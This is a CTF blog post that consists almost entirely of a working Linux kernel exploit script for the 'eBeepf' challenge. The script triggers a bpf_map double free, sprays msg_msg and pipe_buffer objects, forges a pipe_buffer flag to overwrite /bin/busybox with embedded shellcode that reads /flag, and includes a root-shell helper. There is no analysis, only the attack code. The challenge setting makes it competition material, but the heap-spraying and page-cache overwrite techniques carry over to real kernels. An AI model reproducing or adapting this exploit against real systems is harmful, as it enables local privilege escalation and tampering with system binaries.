2024强网拟态决赛-eBeepf

XiaozaYa
已于 2024-11-25 00:02:05 修改
阅读量461
点赞数 4
分类专栏： # kernel-pwn 文章标签： kernel-pwn
于 2024-11-24 23:59:02 首次发布
本文链接：https://blog.youkuaiyun.com/qq_61670993/article/details/144016675
版权
kernel-pwn 专栏收录该内容
47 篇文章
订阅专栏
漏洞分析与利用

分析后面看情况吧，有时间再写吧，先贴个利用脚本：
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
 
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/bpf.h>
#include <sys/prctl.h>
//#include <linux/if_packet.h>
//#include "./bpf_insn.h"

void err_exit(char *msg)
{
    perror(msg);
    sleep(2);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(2);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

static inline int bpf(int cmd, union bpf_attr *attr)
{
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
        union bpf_attr attr = {
                .map_type = map_type,
                .key_size = key_size,
                .value_size = value_size,
                .max_entries = max_entries,
        };
        return bpf(BPF_MAP_CREATE, &attr);
}

int create_bpf_array_of_map(int fd, int key_size, int value_size, int max_entries) {
    union bpf_attr attr = {
        .map_type = BPF_MAP_TYPE_ARRAY_OF_MAPS,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries,
//        .map_flags = BPF_F_MMAPABLE,
        .inner_map_fd = fd,
    };

    int map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
    if (map_fd < 0) {
        return -1;
    }
    return map_fd;
}

static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
        };
        return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
                .flags = flags,
        };
        return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
        };
        return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .next_key = (uint64_t)next_key,
        };
        return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
        struct bpf_map_info info;
        union bpf_attr attr = {
                .info.bpf_fd = map_fd,
                .info.info_len = sizeof(info),
                .info.info = (uint64_t)&info,

        };
        bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
        return info.btf_id;
}

void init() {
        setbuf(stdin, NULL);
        setbuf(stdout, NULL);
        setbuf(stderr, NULL);
}

int trigger(int map_fd) {
        union bpf_attr attr = {
                .map_fd = map_fd,
        };
        return bpf(37, &attr);
}


int key_alloc(char *description, char *payload, size_t plen)
{
    return syscall(__NR_add_key, "user", description, payload, plen, 
                   KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, char *payload, size_t plen)
{
    return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, char *buffer, size_t buflen)
{
    return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid)
{
    return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid)
{
    return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}


struct msg_buf {
        long mtype;
        char mtext[1];
};

struct msg_header {
        void* l_next;
        void* l_prev;
        long m_type;
        size_t m_ts;
        void* next;
        void* security;
};

struct pipe_buffer {
    uint64_t page; // 存放数据的页框
    unsigned int offset, len; // 数据的偏移和大小
    uint64_t ops; // 操作该 buffer 的函数表
    unsigned int flags; // 标志
    unsigned long private; // 私有数据
};

#define ATTACK_FILE "/bin/busybox"
int main(int argc, char** argv, char** envp)
{

	init();
	bind_core(0);
	int res = 0;
	char desc[0x10] = { 0 };
	char buffer[0x1000] = { 0 };
	char msg_buffer[0x2000] = { 0 };
	struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;
	struct pipe_buffer pipe_buffer_data;

	#define SPRAY_PIPE_NUMS 0x10
	int file_fd[SPRAY_PIPE_NUMS];
	for (int i = 0; i < SPRAY_PIPE_NUMS; i++) {
		file_fd[i] = open(ATTACK_FILE, O_RDONLY);
		if (file_fd[i] < 0) err_exit("Failed to open" ATTACK_FILE);
	}

	int pipe_fd[SPRAY_PIPE_NUMS][2];
	for (int i = 0; i < SPRAY_PIPE_NUMS; i++) {
		pipe(pipe_fd[i]);
	//	write(pipe_fd[i][1], "XiaozaYa", 8);
	//	write(pipe_fd[i][1], "BBBBBBBB", 8);
		loff_t offset = i;
		if (splice(file_fd[i], &offset, pipe_fd[i][1], NULL, 1, 0) <= 0)
			err_exit("Failed to exec splice system call");
	}


	int qid = msgget(IPC_PRIVATE, 0666|IPC_CREAT);
	if (qid < 0) err_exit("Failed to exec msgget");

	int key = 0;
        prctl(PR_SET_NAME, "XiaozaYa");
	int inner_map = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, 4, 10);
	if (inner_map < 0) err_exit("Failed to bpf_map_create for inner_map");
	printf("[+] inner_map: %d\n", inner_map);

	int outer_map = create_bpf_array_of_map(inner_map, 4, 4, 10);
	if (outer_map < 0) err_exit("Failed to bpf_map_create for outer_map");
	printf("[+] outer_map: %d\n", outer_map);

	puts("[+] set inner_map.ref = 2");
	if (bpf_map_update_elem(outer_map, &key, &inner_map, BPF_ANY) < 0)
		err_exit("Failed to bpf_map_update_elem");
//	puts("[+] bpf_map_update_elem successfully");

	puts("[+] BUG set inner_map.ref = 1");
	trigger(inner_map);
	
	puts("[+] close outer_map to free inner_mmap's bpf_map object");
	// frist free bpf_map
	close(outer_map);
	
	puts("[+] try to close inner_map");
	// double free bpf_map	
	trigger(inner_map);
	close(inner_map);
	
	puts("[+] spray msg_msg to occupy bpf_map chunk");
	msg_buf->mtype = 1;
	memset(msg_buf->mtext, 'A', 512);
	*(char*)(((char*)msg_buf->mtext) +0xc8+8) = 0x30;
	if (msgsnd(qid, msg_buf, 0x100-0x30+1, 0) < 0)
		err_exit("Failed to exec msgsnd");
	
	msg_buf->mtype = 2;
	if (msgsnd(qid, msg_buf, 0x100-0x30+1, 0) < 0)
		err_exit("Failed to exec msgsnd");
	
//	getchar();

	puts("[+] spray pipe_buffer to occupy bpf_map chunk again");
	for (int i = 0; i < SPRAY_PIPE_NUMS; i++) {
		if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 *8) < 0)
			err_exit("Failed to exec fcntl");
	}
//	getchar();

	memset(buffer, '\x00', sizeof(buffer));
	if(msgrcv(qid, buffer, 0x100, 2, 0) < 0)
		err_exit("msgrcv");
	
	{
		uint64_t* addr = buffer +8;
		if (addr[0] == 0x4141414141414141) {	
			puts("[x] Failed to leak pipe_buffer");
			exit(-1);
		}
		else
			memcpy(&pipe_buffer_data, addr, sizeof(pipe_buffer_data));
	}
	binary_dump("pipe_buffer data", &pipe_buffer_data, sizeof(pipe_buffer_data));
	pipe_buffer_data.flags = 0x10;
	pipe_buffer_data.offset = 0;
	
	memset(msg_buf->mtext, '\x00', 512);
	memcpy(msg_buf->mtext, &pipe_buffer_data, sizeof(pipe_buffer_data));
	for (int i = 0; i < 0x10; i++) {
		msg_buf->mtype = 3+i;
		if (msgsnd(qid, msg_buf, 512-0x30, 0) < 0)
			err_exit("Failed to exec msgsnd");
		
	}

	unsigned char elfcode[] = {
    /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0xb8,
    0x2f, 0x66, 0x6c, 0x61, 0x67, 0x00, 0x00, 0x00, 0x50, 0x6a, 0x02, 0x58,
    0x48, 0x89, 0xe7, 0x31, 0xf6, 0x0f, 0x05, 0x41, 0xba, 0xff, 0xff, 0xff,
    0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x01, 0x5f, 0x99, 0x0f,
    0x05, 0xeb
	};
	sleep(1);
	for (int i = 0; i < SPRAY_PIPE_NUMS; i++) {
		write(pipe_fd[i][1], elfcode, sizeof(elfcode));
	}

	return 0;
}